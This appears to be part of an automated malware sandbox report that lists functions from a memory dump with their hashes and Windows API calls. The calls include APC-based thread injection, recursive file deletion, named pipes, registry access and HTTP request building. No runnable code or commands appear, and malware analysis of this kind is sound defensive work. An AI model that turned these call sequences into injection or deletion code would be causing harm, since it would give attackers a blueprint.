    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF422, Relevance: 10.6, APIs: 7, Instructions: 85 Total matches: 37registrylibraryloader
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CB35F, Relevance: 10.6, APIs: 7, Instructions: 65 Total matches: 59threadprocesslibrary
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D72AD, Relevance: 7.6, APIs: 5, Instructions: 107 Total matches: 56file
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBEAE, Relevance: 7.5, APIs: 5, Instructions: 44 Total matches: 120pipethread
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CDCA5, Relevance: 4.5, APIs: 3, Instructions: 27 Total matches: 86memorynative
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CCB46, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 378 Total matches: 52memorystring
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C51AB, Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 438 Total matches: 26synchronizationmemorythread
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3684, Relevance: 27.3, APIs: 18, Instructions: 264 Total matches: 106memorystring
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D9BD6, Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 208 Total matches: 54filememorytime
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
